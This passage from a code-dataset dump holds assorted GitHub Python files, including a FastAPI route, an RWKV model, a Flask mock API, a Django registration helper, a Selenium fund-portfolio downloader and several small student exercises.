int(input())\n\nfor t in range(1, T+1):\n numbers = map(int,input().split())\n holls = []\n for number in numbers :\n if 1 == number % 2 :\n holls.append(number)\n\n print(f'#{t} {sum(holls)}')","repo_name":"gata96/EXAM-01","sub_path":"2200075/홀수만 더하기.py","file_name":"홀수만 더하기.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"70667469281","text":"from fastapi import APIRouter, Depends\n\nfrom auth.base_config import current_user\n\nfrom .tasks import send_email\n\nrouter = APIRouter(prefix='/report', tags=['Tasks'])\n\n\n@router.get('/send_report')\ndef get_report(user=Depends(current_user)):\n send_email.delay(user.username, user.email)\n return {\n 'status': 200,\n 'data': 'Письмо отправлено',\n 'details': None\n }","repo_name":"dimansidorov/fastapi_project","sub_path":"src/tasks/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4832363123","text":"# 1306. Jump Game III\n# dfs until we reach a zero we have two options at all times \n# go front and go back which acts like two edges\nfrom collections import deque\nclass Solution:\n def canReach(self, arr: List[int], start: int) -> bool:\n if arr[start]==0:\n return True\n N = len(arr)\n visited = set([start])\n que = deque([start])\n \n while que:\n node = que.popleft()\n front = node + arr[node]\n back = node - arr[node]\n \n if 0<=front shape[1]:\n gain = math.sqrt(shape[0] / shape[1])\n if shape[0] == config.vocab_size and shape[1] == config.n_embd: # final projection?\n scale = config.rwkv_emb_scale\n\n if isinstance(m, nn.Embedding):\n gain = math.sqrt(max(shape[0], shape[1]))\n if shape[0] == config.vocab_size and shape[1] == config.n_embd: # token emb?\n scale = config.rwkv_emb_scale\n\n if hasattr(m, 'scale_init'):\n scale = m.scale_init\n\n print(str(shape[0]).ljust(5), str(shape[1]).ljust(5), f'{round(scale,2):g}'.ljust(4), name)\n\n gain *= scale\n if gain == 0:\n nn.init.zeros_(m.weight) # zero init is great for some RWKV matrices\n elif gain > 0:\n nn.init.orthogonal_(m.weight, gain=gain)\n else:\n nn.init.normal_(m.weight, mean=0, std=-gain)\n\nclass RWKV_TimeMix(nn.Module):\n def __init__(self, config, layer_id):\n super().__init__()\n assert config.n_attn % config.n_head == 0\n self.layer_id = layer_id\n self.ctx_len = config.ctx_len\n self.n_head = config.n_head\n self.head_size = config.n_attn // config.n_head\n\n with torch.no_grad(): # initial time_w curves for better convergence\n ww = torch.ones(config.n_head, config.ctx_len)\n curve = torch.tensor([-(config.ctx_len - 1 - i) for i in range(config.ctx_len)]) # the distance\n for h in range(config.n_head):\n if h < config.n_head - 1:\n decay_speed = math.pow(config.ctx_len, -(h+1)/(config.n_head-1))\n else:\n decay_speed = 0.0\n ww[h] = torch.exp(curve * decay_speed)\n # print('layer', layer_id, 'head', h, 'decay_speed', round(decay_speed, 4), ww[h][:5].numpy(), '...', ww[h][-5:].numpy())\n self.time_w = nn.Parameter(ww)\n\n self.time_alpha = nn.Parameter(torch.ones(self.n_head, 1, config.ctx_len))\n self.time_beta = nn.Parameter(torch.ones(self.n_head, config.ctx_len, 1))\n self.time_gamma = nn.Parameter(torch.ones(config.ctx_len, 1))\n \n self.time_shift = nn.ZeroPad2d((0,0,1,-1))\n\n self.key = nn.Linear(config.n_embd, config.n_attn)\n self.value = nn.Linear(config.n_embd, config.n_attn)\n self.receptance = nn.Linear(config.n_embd, config.n_attn)\n\n # if config.rwkv_tiny_attn > 0:\n # self.tiny_att = RWKV_TinyAttn(config)\n\n self.output = nn.Linear(config.n_attn, config.n_embd)\n\n self.key.scale_init = 0\n self.receptance.scale_init = 0\n self.output.scale_init = 0\n\n def forward(self, x):\n B, T, C = x.size()\n TT = self.ctx_len\n w = F.pad(self.time_w, (0, TT))\n w = torch.tile(w, [TT])\n w = w[:, :-TT].reshape(-1, TT, 2 * TT - 1)\n w = w[:, :, TT-1:] # w is now a circulant matrix\n w = w[:, :T, :T] * self.time_alpha[:, :, :T] * self.time_beta[:, :T, :]\n\n x = torch.cat([self.time_shift(x[:, :, :C//2]), x[:, :, C//2:]], dim = -1)\n # if hasattr(self, 'tiny_att'):\n # tiny_att = self.tiny_att(x, self.mask)\n\n k = self.key(x)\n v = self.value(x)\n r = self.receptance(x)\n\n k = torch.clamp(k, max=30, min=-60) # clamp extreme values. e^30 = 10^13\n k = torch.exp(k)\n sum_k = torch.cumsum(k, dim=1)\n\n kv = (k * v).view(B, T, self.n_head, self.head_size)\n\n wkv = (torch.einsum('htu,buhc->bthc', w, kv)).contiguous().view(B, T, -1)\n\n rwkv = torch.sigmoid(r) * wkv / sum_k\n\n rwkv = self.output(rwkv)\n # if hasattr(self, 'tiny_att'):\n # rwkv += tiny_att\n\n return rwkv * self.time_gamma[:T, :]\n\nclass RWKV_ChannelMix(nn.Module):\n def __init__(self, config, layer_id):\n super().__init__()\n self.layer_id = layer_id\n self.time_shift = nn.ZeroPad2d((0,0,1,-1))\n \n hidden_sz = 5 * config.n_ffn // 2 # can use smaller hidden_sz because of receptance gating\n self.key = nn.Linear(config.n_embd, hidden_sz)\n self.value = nn.Linear(config.n_embd, hidden_sz)\n self.weight = nn.Linear(hidden_sz, config.n_embd)\n self.receptance = nn.Linear(config.n_embd, config.n_embd)\n\n self.receptance.scale_init = 0\n self.weight.scale_init = 0\n\n def forward(self, x):\n B, T, C = x.size()\n \n x = torch.cat([self.time_shift(x[:, :, :C//2]), x[:, :, C//2:]], dim = -1)\n k = self.key(x)\n v = self.value(x)\n r = self.receptance(x)\n \n wkv = self.weight(F.mish(k) * v) # i find mish is a bit better than gelu\n\n rwkv = torch.sigmoid(r) * wkv\n\n return rwkv\n\nclass RWKV_TinyAttn(nn.Module): # extra tiny attention\n def __init__(self, config):\n super().__init__()\n self.d_attn = config.rwkv_tiny_attn\n self.n_head = config.rwkv_tiny_head\n self.head_size = self.d_attn // self.n_head\n\n self.qkv = nn.Linear(config.n_embd, self.d_attn * 3)\n self.out = nn.Linear(self.d_attn, config.n_embd)\n\n def forward(self, x, mask):\n B, T, C = x.size()\n qkv = self.qkv(x)\n q, k, v = qkv.chunk(3, dim = -1)\n\n if self.n_head > 1:\n q = q.view(B, T, self.n_head, self.head_size).transpose(1, 2) # (B, T, C) -> (B, nh, T, hs)\n k = k.view(B, T, self.n_head, self.head_size).transpose(1, 2) # (B, T, C) -> (B, nh, T, hs)\n v = v.view(B, T, self.n_head, self.head_size).transpose(1, 2) # (B, T, C) -> (B, nh, T, hs)\n\n qk = (q @ k.transpose(-2, -1)) * (1.0 / math.sqrt(self.head_size)) # (B, nh, T, hs) * (B, nh, hs, T) -> (B, nh, T, T)\n qk = qk.masked_fill(mask == 0, float('-inf'))\n qk = F.softmax(qk, dim = -1)\n qkv = qk @ v # (B, nh, T, T) * (B, nh, T, hs) -> (B, nh, T, hs)\n\n if self.n_head > 1:\n qkv = qkv.transpose(1, 2).contiguous().view(B, T, -1) # (B, nh, T, hs) -> (B, T, nh, hs) -> (B, T, C)\n \n return self.out(qkv)\n \nclass Block(nn.Module):\n def __init__(self, config, layer_id):\n super().__init__()\n self.config = config\n\n self.ln1 = nn.LayerNorm(config.n_embd)\n self.ln2 = nn.LayerNorm(config.n_embd)\n\n self.attn = RWKV_TimeMix(config, layer_id)\n self.mlp = RWKV_ChannelMix(config, layer_id)\n\n def forward(self, x):\n x = x + self.attn(self.ln1(x))\n x = x + self.mlp(self.ln2(x))\n \n return x","repo_name":"lukasVierling/COMP4771","sub_path":"models/RWKV.py","file_name":"RWKV.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21499369094","text":"#printf \"\\e[?2004l\"\nfrom __future__ import print_function, division, absolute_import\n\n# Imports\nimport os, sys, matplotlib, h5py, random, glob, json\nimport numpy as np, matplotlib.pyplot as plt, tensorflow as tf\n\nmatplotlib.use('Agg')\n\nfrom tensorflow import keras\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.models import model_from_yaml\nfrom tensorflow.keras import backend as K\n#import pandas as pd\n\n#random seed to control the reproducability\nseed = 8675309\nnp.random.seed(seed)\n#np.random.seed(datetime.datetime.now().microsecond)\npath = '/pylon5/as5phnp/tbilling/sandbox/hyper_param_optimiz/ml_paper1/opt_versions/200steps/'\ndata_path = path+'opt_2DConv_dense_layer_200Steps/'\nmodel_path = path\noutputdir = model_path\n\ndef Mean_Squared_over_true_Error(y_true, y_pred):\n # Create a custom loss function that divides the difference by the true\n y_true = K.cast(y_true, y_pred.dtype) #Casts a tensor to a different dtype and returns it.\n diff_ratio = K.square((y_pred - y_true)/K.clip(K.abs(y_true),K.epsilon(),None))\n loss = K.mean(diff_ratio, axis=-1)\n # Return a function\n\n return loss\n\ndef r2_keras(y_true, y_pred):\n SS_res = K.sum(K.square(y_true - y_pred))\n SS_tot = K.sum(K.square(y_true - K.mean(y_true)))\n return ( 1 - SS_res/(SS_tot + K.epsilon()) )\n\nmodels = sorted(glob.glob(model_path+\"hyperParam_model_*.h5\"))\n\nfor m in models:\n #custom_objects={\"r2_keras\":r2_keras}\n model = load_model(m, compile=True,\n custom_objects={\"r2_keras\":r2_keras, \"Mean_Squared_over_true_Error\":Mean_Squared_over_true_Error})\n model.compile(optimizer=keras.optimizers.Adam(lr=0.0001, decay=0.),\n loss=Mean_Squared_over_true_Error,\n metrics=[r2_keras,'mse', 'mae', 'mape'])\n\n\n# save as YAML\nyaml_string = model.to_yaml()\n\n# model reconstruction from YAML:\nmodel = model_from_yaml(yaml_string)\n\n\n# read json files\ntrial_files = glob.glob(data_path+\"/trial_*/trial.json\")\n\nwith open(trial_files[0]) as f:\n data = json.load(f)\n\nbestmodel = load_model(\"__hyperParam_model.h5\",custom_objects={\"r2_keras\":r2_keras,\"Mean_Squared_over_true_Error\":Mean_Squared_over_true_Error})\n\nbestmodel.compile(optimizer=keras.optimizers.Adam(lr=0.0001, decay=0.),\n loss=Mean_Squared_over_true_Error,\n metrics=[r2_keras,'mse', 'mae', 'mape'])\n \nnp.array(list(bestmodel.layers[0].variables))[1]\nscore=bestmodel.evaluate(val_x, val_y, batch_size=32, verbose=1)\n\n# WARNING:tensorflow:Error in loading the saved optimizer state. As a result, your model is starting with a freshly initialized optimizer.\n","repo_name":"TashaleeB/ThesisResearch","sub_path":"ML/scripts/RandomSearchOptimization/read_in_model.py","file_name":"read_in_model.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16911859174","text":"\"\"\"Python Program to Find the Factorial of a Number Using Recursion\"\"\"\n\ndef factorial_number(s):\n def helper(x):\n if x > 0 and type(x) == int:\n return s(x)\n else:\n raise Exception(\"Number is negative\")\n return helper\n\n@factorial_number\ndef factorial(n):\n if n == 1:\n return 1\n else:\n return n * factorial(n-1)\n\nn = int(input())\nprint(factorial(n))","repo_name":"nekapoor7/Python-and-Django","sub_path":"Python/cppsecrets.com/program 56.py","file_name":"program 56.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9347788987","text":"# File: Benford.py\n\n# Description: reads the concesus data and prints the count of numbers for each leading digit and the their percentage\n\n# Student Name: Arturo Reyes Munoz\n\n# Student UT EID: ar48836\n\n# Course Name: CS 303E\n\n# Unique Number: 50865\n\n# Date Created: 04/21\n\n# Date Last Modified: 04/21\n\ndef main():\n\n\tpop_freq = {}\n\tpop_freq [1] = 0\n\tpop_freq [2] = 0\n\tpop_freq [3] = 0\n\tpop_freq [4] = 0\n\tpop_freq [5] = 0\n\tpop_freq [6] = 0\n\tpop_freq [7] = 0\n\tpop_freq [8] = 0\n\tpop_freq [9] = 0\n\n\tfile = open (\"./Census_2009.txt\", \"r\")\n\n\theader = file.readline()\n\n\ttotal = 0\n\n\tfor line in file:\n\n\t\tline = line.strip()\n\t\tpop_data = line.split()\n\t\tpop_num = pop_data[-1]\n\t\tpop_freq [int(pop_num[0])] += 1\n\t\ttotal+=1\n\n\tprint('Digit Count %')\n\n\tpercentage = []\n\tspace = ' '\n\n\tfor i in range(1,10):\n\t\tif len(str(pop_freq[i]))<4:\n\t\t\tspace = ' '\n\t\tpercentage.append(round((pop_freq[i]*100/total),1))\n\t\tprint(str(i)+' '+str(pop_freq[i])+space+str(percentage[i-1]))\n\n\tfile.close()\n\nmain()\n\n\n\n\n","repo_name":"arturoreyes93/Benford-Census","sub_path":"Benford.py","file_name":"Benford.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40282710978","text":"import argparse\n\nparser = argparse.ArgumentParser(\n description=\"Display the contents of the specified file in binary format.\"\n)\nparser.add_argument(\n \"filename\", type=str, help=\"name of the file that will be displayed\",\n)\nparser.add_argument(\n \"--hex\",\n action=\"store_true\",\n default=False,\n help=\"display the content of the file in hexadecimal representation (default: False)\",\n)\nparser.add_argument(\n \"--offset\",\n action=\"store\",\n type=int,\n default=0,\n help=\"start reading after from certain offset (default: 0)\",\n)\nparser.add_argument(\n \"--columns\",\n action=\"store\",\n type=int,\n default=\"8\",\n help=\"the number of columns that will be displayed (default: 8)\",\n)\nargs = parser.parse_args()\n\nwith open(args.filename, \"rb\") as f:\n f.seek(args.offset)\n row = 0\n col = 0\n eof = False\n while not eof:\n byte = []\n print(\"{0:>5}\".format(row), end=\": \")\n for col in range(args.columns):\n char = f.read(1)\n if not char:\n eof = True\n break\n byte.append(char)\n\n for b in byte:\n print(\"{0:08b}\".format(ord(b)), end=\" \")\n\n if col != args.columns - 1:\n print(\" \" * (args.columns - col), end=\"\")\n\n print(\"|\", end=\" \")\n for b in byte:\n b = b.decode()\n print(b, end=\"\")\n print(\"\\n\")\n row += 1\n","repo_name":"Fluxmux/BinDump","sub_path":"bindump.py","file_name":"bindump.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17880049412","text":"foods=[\n {\"id\":1,\"name\":\"ghee-roast\",\"price\":70,\"category\":\"veg\"},\n {\"id\":2,\"name\":\"chicken-roast\",\"price\":170,\"category\":\"non-veg\"},\n {\"id\":3,\"name\":\"cb\",\"price\":170,\"category\":\"non-veg\"},\n {\"id\":4,\"name\":\"bb\",\"price\":190,\"category\":\"non-veg\"},\n {\"id\":5,\"name\":\"fried-rice\",\"price\":140,\"category\":\"veg\"},\n {\"id\":6,\"name\":\"chicken-friedrice\",\"price\":170,\"category\":\"non-veg\"},\n {\"id\":7,\"name\":\"nan\",\"price\":70,\"category\":\"veg\"},\n {\"id\":8,\"name\":\"alfham\",\"price\":370,\"category\":\"non-veg\"},\n \n]\n# total number of items\nprint(len(foods))\n\n# print name whose category = veg\nveg=[f.get(\"name\") for f in foods if f.get(\"category\")==\"veg\"]\nprint(veg)\n\n# food names available under rs 100\nunder_100=[f.get(\"name\") for f in foods if f.get(\"price\")<100]\nprint(under_100)\n\n# costly item\ncostly_food=max(foods,key=lambda f:f.get(\"price\"))\nprint(costly_food)\n\n# costly non-veg food\ncostly_non=max(foods,key=lambda f:f.get(\"C\")==\"non-veg\" and f.get(\"price\"))\nprint(costly_non)\n\n# print all category\ncategory={f.get(\"category\") for f in foods}\nprint(category)","repo_name":"nikhiljose13/python_work","sub_path":"dictionary/nested_dicti/food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3442781752","text":"from selenium import webdriver\nimport cfscrape\nimport time\nimport os\n\n\ndef download(dates, path):\n file_path = os.path.join(path, 'shriram\\\\')\n if not os.path.exists(file_path):\n os.mkdir(file_path)\n\n chrome_driver = 'chromedriver.exe'\n\n scraper = cfscrape.create_scraper()\n chrome_options = webdriver.ChromeOptions()\n prefs = {\"download.default_directory\": file_path}\n chrome_options.add_experimental_option(\"prefs\", prefs)\n driver = webdriver.Chrome(executable_path=chrome_driver, chrome_options=chrome_options)\n driver.get(\"http://www.shriramamc.com/StatDis-MonthlyPort.aspx\")\n\n for d in dates:\n month = d.strftime('%b')\n year = d.strftime('%Y')\n\n portfolio_panel = driver.find_element_by_xpath(\n './/th[contains(text(), \"Monthly Portfolio for the Financial Year\")]')\n portfolio_panel = portfolio_panel.find_element_by_xpath('ancestor::tbody')\n\n fin_year1 = year + '-' + str(int(year) + 1)\n fin_year2 = str(int(year) - 1) + '-' + year\n flag = 0\n try:\n fin_year_panel = portfolio_panel.find_element_by_xpath('.//td[contains(text(), \"' + fin_year1 + '\")]')\n fin_year_panel = fin_year_panel.find_element_by_xpath('preceding-sibling::td//img')\n fin_year_panel.click()\n time.sleep(2)\n fin_year_panel = fin_year_panel.find_element_by_xpath('ancestor::tr/following-sibling::tr')\n file = fin_year_panel.find_element_by_xpath('.//td[contains(text(),\"' + month + '\") \\\n and contains(text(),\"' + year + '\")]')\n\n flag = 1\n except:\n pass \n if flag == 0:\n try:\n fin_year_panel = portfolio_panel.find_element_by_xpath('.//td[contains(text(), \"' + fin_year2 + '\")]')\n fin_year_panel = fin_year_panel.find_element_by_xpath('preceding-sibling::td//img')\n fin_year_panel.click()\n time.sleep(2)\n fin_year_panel = fin_year_panel.find_element_by_xpath('ancestor::tr/following-sibling::tr')\n file = fin_year_panel.find_element_by_xpath('.//td[contains(text(),\"' + month + '\") \\\n and contains(text(),\"' + year + '\")]')\n except:\n continue \n\n file.find_element_by_xpath('following-sibling::td//input').click()\n time.sleep(10)\n\n save_file_name = \"shriram_portfolios_\" + d.strftime('%Y%m') + '.xls'\n print('Downloading file for Shriram for ' + d.strftime('%b%Y'))\n file_name = max([file_path + f for f in os.listdir(file_path)], key=os.path.getctime)\n os.rename(os.path.join(file_path, file_name), os.path.join(file_path, save_file_name))\n\n driver.refresh()\n time.sleep(3)\n\n driver.close()\n","repo_name":"anshuljn30/mf_download","sub_path":"download_shriram_holdings.py","file_name":"download_shriram_holdings.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12653575783","text":"from flask import Flask, json, request, jsonify\nfrom flask_cors import CORS\nfrom RawCat import RawCat\n\ngps = {\"gps\": {\"location\": {\"longitude\": 11.924482585745864, \"latitude\": 57.5726428059939}, \"course\": 45}}\nrouteInfo = {\"longitude\": 11.924482585745864, \"latitude\": 57.5726428059939, \"course\": 45, \"refcourse\": 45, \"goallongitude\": 11.467781080864368, \"goallatitude\": 58.19432362991195,}\napi = Flask(__name__)\nCORS(api)\n\nrawcat = RawCat()\n\n@api.route('/route', methods=['GET'])\ndef get_route():\n json_data = None\n with open('route.json', 'r') as j:\n json_data = json.load(j)\n\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n if(request.args.get('goalIndex') != None):\n print(\"goal:\" + request.args.get('goalIndex'))\n settings['route']['goalIndex'] = int(request.args.get('goalIndex'))\n \n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n\n rawcat.updateRoute()\n\n return jsonify(json_data)\n\n\n@api.route('/route', methods=['POST'])\ndef post_route():\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n\n if(request.args.get('keepIndex') != None and request.args.get('keepIndex') != \"true\"):\n settings['route']['goalIndex'] = 0\n \n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n\n requestjson = json.loads(request.data)\n\n with open('route.json', 'w') as outfile:\n json.dump(requestjson, outfile)\n\n rawcat.updateRoute()\n return jsonify(requestjson)\n\n\n@api.route('/gps', methods=['GET'])\ndef get_gps():\n return json.dumps(gps)\n\n\n@api.route('/routeInfo', methods=['GET'])\ndef get_routeInfo():\n return json.dumps(routeInfo)\n\n\n@api.route('/all', methods=['GET'])\ndef get_all():\n data = None\n with open('data.json', 'r') as j:\n data = json.load(j)\n\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n \n allData = {\"data\": data, \"settings\": settings}\n\n return json.dumps(allData)\n\n\n@api.route('/data', methods=['GET'])\ndef get_data():\n json_data = None\n with open('data.json', 'r') as j:\n json_data = json.load(j)\n return jsonify(json_data)\n\ndef boolConverter(b):\n if(b == \"true\" or b == \"True\"):\n return True\n return False\n\n@api.route('/rudder', methods=['GET'])\ndef get_rudder():\n darkMode = request.args.get('darkMode')\n ref = request.args.get('ref')\n \n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n\n if(darkMode != None):\n settings['rudder']['darkMode'] = boolConverter(darkMode)\n\n if(ref != None):\n settings['rudder']['ref'] = int(ref)\n\n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n \n return jsonify(settings['rudder'])\n\n@api.route('/controller', methods=['GET'])\ndef get_controller():\n type_v = request.args.get('type')\n r = request.args.get('r')\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n\n if(type_v != None):\n settings['controller']['type'] = type_v\n if(r != None):\n settings['controller']['refCourse'] = r\n if(request.args.get('reflatitude') != None):\n settings['controller']['reflocation']['latitude'] = request.args.get('reflatitude')\n if(request.args.get('reflongitude') != None):\n settings['controller']['reflocation']['longitude'] = request.args.get('reflongitude')\n\n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n \n return jsonify(settings['controller'])\n\n\n@api.route('/settings', methods=['GET'])\ndef get_settings():\n json_data = None\n with open('settings.json', 'r') as j:\n json_data = json.load(j)\n\n return jsonify(json_data)\n\n\n@api.route('/settings', methods=['POST'])\ndef post_settings():\n requestjson = json.loads(request.data)\n with open('settings.json', 'w') as outfile:\n json.dump(requestjson, outfile)\n return jsonify(requestjson)\n\n@api.route('/phone', methods=['POST'])\ndef post_phone():\n settings = None\n with open('settings.json', 'r') as j:\n settings = json.load(j)\n settings['controller']['refCourse'] =request.json[\"locationMagneticHeading\"]\n with open('settings.json', 'w') as outfile:\n json.dump(settings, outfile)\n requestjson = json.loads(request.data)\n with open('phone.json', 'w') as outfile:\n json.dump(requestjson, outfile)\n return jsonify(requestjson)\n\nif __name__ == '__main__':\n # api.run()\n api.run(host=\"0.0.0.0\")\n\n\n","repo_name":"edvinag/rawweb","sub_path":"mock/mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22330027576","text":"import uuid\n\nfrom django.conf import settings\nfrom django.contrib import auth, messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom profile_app.models import Designation, Employee\n\nfrom ..forms import EmployeePrileAppForm, UserProfileAppForm\n\n\ndef getFunction(request):\n form_list = [UserProfileAppForm, EmployeePrileAppForm]\n return render(request, \"base_app/register.html\", {\n \"forms\" : form_list,\n })\n\ndef postFunction(request):\n user_form = UserProfileAppForm(request.POST)\n emp_form = EmployeePrileAppForm(request.POST, request.FILES)\n\n if user_form.is_valid() and emp_form.is_valid():\n username = user_form.cleaned_data['username']\n first_name = user_form.cleaned_data['first_name']\n last_name = user_form.cleaned_data['last_name']\n email = user_form.cleaned_data['email']\n password = user_form.cleaned_data['password']\n designation = emp_form.cleaned_data['designation']\n image = emp_form.cleaned_data['image']\n\n if User.objects.filter(email=email).first():\n messages.warning(request, \"Email is already taken!\")\n return HttpResponseRedirect(reverse(\"register\"))\n\n auth_token = str(uuid.uuid4())[:4]\n user_obj = User.objects.create_user(username, email, password, first_name=first_name, last_name=last_name)\n\n designation_obj = Designation.objects.get(position=designation)\n\n employee_obj = Employee(user=user_obj, auth_token=auth_token, designation=designation_obj, image=image)\n employee_obj.save()\n\n send_verification_mail(request, username, email, auth_token)\n\n return HttpResponseRedirect(reverse(\"token\"))\n else:\n messages.warning(request, \"Username is already taken!\")\n return HttpResponseRedirect(reverse(\"register\"))\n\ndef send_verification_mail(request, username, email, token):\n subject = \"Welcome to Software Giant\"\n current_domain = get_current_site(request)\n message = f\"Hi {username}, thank you for registering in Software Giant and click the link to verfiy your email {current_domain}/verfiy/{token}\"\n email_form = settings.EMAIL_HOST_USER\n recipient_list = [email,]\n send_mail(subject, message, email_form, recipient_list)\n\n\ndef logout(request):\n auth.logout(request)\n\n","repo_name":"istiakahmad62/Company-Attendance-System","sub_path":"base_app/helper_function_modules/register_helper.py","file_name":"register_helper.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69937478562","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx, y = [], []\n\nfor i in open(\"prices.txt\", \"r\"):\n _x, _y = i.split(\",\")\n x.append(float(_x))\n y.append(float(_y))\n\nx, y = np.array(x), np.array(y)\n\nx = (x - x.mean()) / x.std()\n\n# 在(-2,4)区间取100个点作为画图基础\nx0 = np.linspace(-2, 4, 100)\n\n\n# n 是模型多项式次数\n# 返回的模型根据输入的下(默认是x0), 返回相对的预测的y\ndef getModel(n):\n return lambda input_x=x0: np.polyval(np.polyfit(x, y, n), input_x)\n\n\n# 根据参数的n, 输入的x, y 返回相对于的损失\ndef getCost(n, input_x, input_y):\n return 0.5 * ((getModel(n)(input_x) - input_y) ** 2).sum()\n\n\ntest_set = (1, 4, 10)\n\n# 损失看起来n=10最好,但是图看起来n=1最好, 可知n=10是 过拟合\nfor i in test_set:\n print(getCost(i, x, y))\n\nplt.figure()\nplt.scatter(x, y, c=\"g\", s=20)\nfor test in test_set:\n plt.plot(x0, getModel(test)(), label=\"degree = {}\".format(test))\n\nplt.xlim(-2, 4)\n\nplt.ylim(1e5, 8e5)\nplt.legend()\nplt.show()\n","repo_name":"Lyn4444/machineLearningTest","sub_path":"sample1/ch1.py","file_name":"ch1.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29333165639","text":"import utilityFunctions as utilityFunctions\n\ndef perform(level, box, options):\n\tfloorPlans = [\n\t\t[\n\t\t\t[0, 0, 0, 0, 0],\n\t\t\t[0, 1, 1, 1, 0],\n\t\t\t[0, 1, 1, 1, 0],\n\t\t\t[0, 1, 1, 1, 0],\n\t\t\t[0, 0, 0, 0, 0]\n\t\t]\n\t]\n\thouse = House(box.minx, box.minz, box.miny, 4, floorPlans)\n\thouse.build()\n\nclass House:\n\tbeamBlock = (17,0)\n\tconstructionPlans = []\n\n\tdef __init__(self, xStart, zStart, baseHeight, floorHeight, floorPlans = []):\n\t\tself.xStart = xStart\n\t\tself.zStart = zStart\n\t\tself.baseHeight = baseHeight\n\t\tself.floorHeight = floorHeight\n\t\tself.floorPlans = floorPlans\n\t\n\tdef createConstructionPlans(self):\n\t\tfor floor in self.floorPlans:\n\t\t\tconstructionFloor = []\n\t\t\tfor line in floor:\n\t\t\t\tconstructionFloorLine = []\n\t\t\t\tfor block in line:\n\t\t\t\t\tif (block == 0):\n\t\t\t\t\t\tconstructionFloorLine.append({\"outside\", \"\"})\n\t\t\t\t\telse:\n\t\t\t\t\t\tconstructionFloorLine.append({\"inside\", \"\"})\n\t\t\t\tconstructionFloor.append(constructionFloorLine)\n\t\t\tself.constructionPlans.append(constructionFloor)\n\t\n\tdef build(self):\n\t\tprint('yo')","repo_name":"Nequilich/GDMC-Filters","sub_path":"Temp/GenerateHouse.py","file_name":"GenerateHouse.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1881147986","text":"# coding=utf-8\nfrom django import forms\nfrom django.utils import timezone\nfrom django.core.validators import validate_email\nfrom django.core.exceptions import ValidationError\nfrom .models import FollowUp\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, HTML, Button, Div\nfrom crispy_forms.bootstrap import TabHolder, Tab, Alert, FieldWithButtons, StrictButton\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\n\nclass LanguageForm(forms.Form):\n language = forms.ChoiceField(choices = settings.LANGUAGES, required=True, label='Change language / Cambiar el idioma / Changer la langue')\n\n def __init__(self, *args, **kwargs):\n super(LanguageForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper(self)\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-sm-5 col-md-5 col-lg-5'\n self.helper.field_class = 'col-sm-4 col-md-4 col-lg-4'\n self.helper.layout = Layout(\n FieldWithButtons(\n 'language',\n StrictButton('Change language ', type='submit', name='change_language', css_class=\"btn-success\"),\n ),\n )\n\n\nclass FollowUpForm(forms.ModelForm):\n\n class Meta:\n model = FollowUp\n localized_fields = '__all__'\n fields = ('familiarity',\n 'rating',\n 'incident_date_1','incident_text_1',\n 'incident_date_2','incident_text_2',\n 'incident_date_3','incident_text_3',\n 'incident_date_4','incident_text_4',\n 'incident_date_5','incident_text_5',\n 'attention',\n 'intervention',\n 'impact',\n 'further_comments',\n 'want_informed',\n 'contact_again',\n 'email_address',\n )\n widgets = {\n 'rating': forms.RadioSelect(),\n 'familiarity': forms.RadioSelect(),\n 'attention': forms.RadioSelect(),\n 'intervention': forms.RadioSelect(),\n 'impact': forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_1' : forms.Textarea(attrs={'rows': 3,\n 'cols': 40,\n 'style': 'height: 8em;'}),\n 'incident_text_2' : forms.Textarea(attrs={'rows': 